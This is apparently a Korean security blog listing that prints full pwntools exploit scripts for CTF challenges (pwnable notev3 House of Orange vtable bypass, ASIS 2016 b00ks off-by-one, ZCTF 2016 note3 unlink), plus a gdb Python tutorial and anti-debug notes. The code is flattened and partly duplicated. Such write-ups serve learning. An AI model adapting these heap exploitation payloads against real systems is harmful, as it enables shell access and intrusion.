Vtable check bypass
예제 pwnable.tw notev3
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465from pwn import *#context.log_level = 'debug'def make_note(size,title): r.sendlineafter('>','1') r.sendlineafter('Size:',str(size)) r.sendafter('Title:',title) def make_note1(size,title,note): r.sendlineafter('>','1') r.sendlineafter('Size:',str(size)) r.sendafter('Title:',title) r.sendafter('Note:',note) def edit_note(idx,data): r.sendlineafter('>','2') r.sendlineafter('Note:',str(idx)) r.sendafter('Data:',data) def list_note(): r.sendlineafter('>','3') #r=process('./challenge',env={'LD_PRELOAD':'alpine-libc-2.24.so'})r=remote('svc.pwnable.xyz',30041)win=0x4008a2script=''''''_IO_str_jumps_off=0x390500#debug = +21640#server = -(libc.symbols['__malloc_hook']+88+0x10) e=ELF('./challenge')libc=ELF('./alpine-libc-2.24.so')make_note(-1,'AAAA')#1edit_note(0,p64(0)+p64(0x31)+p64(0)*5+'\xb1\x0f\x00'+'\x00'*0xff)make_note1(0x1000,'\n','\x00'*0xff)#2make_note(-1,'AAAA'*2)#3list_note()r.recvuntil('A'*8)value=u64(r.recvuntil('\x7f').ljust(8,'\x00'))log.info(hex(value))libc_base=value-(libc.symbols['__malloc_hook']+88+0x10) _IO_list_all=libc_base+libc.symbols['_IO_list_all']-0x10log.info(hex(libc_base))log.info(hex(_IO_list_all))heap_leak=p64(0)+p64(0x31)+'A'*72edit_note(0,heap_leak)list_note()r.recvuntil('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')heap=u64(r.recv(4).ljust(8,'\x00').replace('\x3a','\x00'))-0x50log.info(hex(heap))payload=p64(0)+p64(0x31)+p64(0)*4fake=p64(0)+p64(0x61)+p64(libc_base)+p64(_IO_list_all)fake+=p64(2)+p64(3)fake+=p64(0)+p64(libc_base+list(libc.search('/bin/sh'))[0])fake+=p64(0)*0x10fake+=p64(0)fake+=p64(0)*2fake+=p64(libc_base+libc.symbols['_IO_file_jumps']+0xc0-0x8)fake=fake.ljust(0xe8,'\x00')fake+=p64(win)*40payload+=fakeedit_note(2,payload)r.sendlineafter('>','1')r.sendlineafter('Size:','1')#gdb.attach(r,script)r.interactive()Colored by Color Scriptercs
https://st4nw.github.io/glibc2.24-orange
12345678910fake = p64(0) + p64(0x61)fake += p64(0) + p64(_IO_list_all-0x10)fake += p64(2) + p64(3)fake += p64(0) + p64(binsh) # _IO_buf_basefake += p64(0) * 0x10fake += p64(0) # modefake += p64(0) * 2fake += p64(_IO_str_jumps-0x8)fake = fake.ljust(0xe8, '\x00')fake += p64(system)cs
[Read More]
Python gdb module 사용법
Python gdb module 사용법
simplecommand.py
1234567891011121314import gdb class SimpleCommand(gdb.Command): def __init__(self): # This registers our class as "simple_command" super(SimpleCommand, self).__init__("simple_command", gdb.COMMAND_DATA) def invoke(self, arg, from_tty): # When we call "simple_command" from gdb, this is the method # that will be called. print("Hello from simple_command!") # This registers our class to the gdb runtime at "source" time.SimpleCommand()Colored by Color Scriptercs
gdb.execute : gdb 명령을 사용할수 있게함
ex) gdb.execute(‘b*(주소값)’), gdb.execute(‘set pagination off’), gdb.execute(‘r’)
int(gdb.parse_and_eval(“$rip”)) : rip 값을 반환
xxd “파일이름”
grep 찾을내용
objdump -d 파일
grep xxd값
[Read More]
Asis_2016_books
ASIS_2016_books
off_by_one
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960from pwn import * def create(name_size,content,des_size,content2): sla('>','1') sla(':',str(name_size)) sla(':',content) sla(':',str(des_size)) sla(':',content2) def edit(ids,des): sla('>','3') sla(':',str(ids)) sla(':',des) def delete(ids): sla('>','2') sla(':',str(ids)) def show(): sla('>','4') def change_name(name): sla('>','5') sla(':',name) r=process('./b00ks')e=ELF('./b00ks')libc=e.libc sla = lambda x,y : r.sendlineafter(x,y)ru = lambda x : r.recvuntil(x)sa = lambda x,y : r.sendafter(x,y) sla(':','A'*0x20) create(0x80,'A'*0x7f,0x80,'A'*0x7f)create(0x80,'B'*0x7f,0x80,'B'*0x7f) show()ru('Author: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')heap=u64(ru('\n').replace('\n','')+'\x00\x00')-0x140log.info(hex(heap)) delete(2) edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(heap+0xb0)+p64(0x80)) change_name('A'*0x20) show()ru('Name: ')libc_leak=u64(ru('\x7f')+'\x00\x00')-0x3c4b78oneshot=libc_leak+0x4526alog.info(hex(libc_leak)) edit(1,'A'*0x50+p64(1)+p64(heap+0x170)+p64(libc_leak+libc.symbols['__free_hook'])+p64(0x80)) edit(1,p64(oneshot))delete(1)r.interactive()Colored by Color Scriptercs
[Read More]
Zctf_2016_note3
ZCTF_2016_note3
간단한 unlink이다
unlink 사용법 : fd(전역변수-0x18)+bk(전역변수-0x10)+prev_size(앞의사이즈-0x10)+prev_inuse해제(사이즈-0x1)
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768from pwn import * def new(size,content): sla('>>','1') sla(')',str(size)) sla(':',content) def edit(idx,content): sla('>>','3') sla(':',str(idx)) sla(':',content) from pwn import * def new(size,content): sla('>>','1') sla(')',str(size)) sla(':',content) def edit(idx,content): sla('>>','3') sla(':',str(idx)) sla(':',content) def delete(idx): sla('>>','4') sla(':',str(idx)) r=process('./note3')e=ELF('./note3')libc=e.libc sla = lambda x,y : r.sendlineafter(x,y)ru = lambda x : r.recvuntil(x) for i in range(8): new(0x80,'A'*8) fuck=-9223372036854775808 edit(3,'A')payload=p64(0)+p64(0x81)payload+=p64(0x6020c0-0x18+0x20)+p64(0x6020c0-0x10+0x20)payload+='\x00'*0x60payload+=p64(0x80)+p64(0x90)edit(fuck,payload) delete(4) payload2=p64(e.got['free'])*2+p64(e.got['atoi'])*2 edit(3,payload2)edit(1,p32(e.plt['puts'])+'\x00\x00') r.interactive()delete(2) r.recv(1) leak = u64(ru('\x7f').ljust(8,'\x00'))-libc.symbols['atoi']log.info(hex(leak)) edit(3,p64(leak+libc.symbols['system']).replace('\x00',''))sla('>>','/bin/sh') r.interactive()Colored by Color Scriptercs
[Read More]
Anti Debug
Anti-debug 1. IsDebuggerPresent 함수 가장 기본적인 Anti-debugger windows.h 헤더 파일에 있다. 2. NtGlobalFlag PEB에서 0x68 위치에 존재하는 값 디버깅 중일 경우 이 값이 0x70으로 설정 3. CheckRemoteDebuggerPresent ### 4. FindWindow ex) FindWindow(NULL,L”OLLYDBG”); 5. NtQueryObject 디버깅 중이면 DebugObject라는 객체를 생성 이...
[Read More]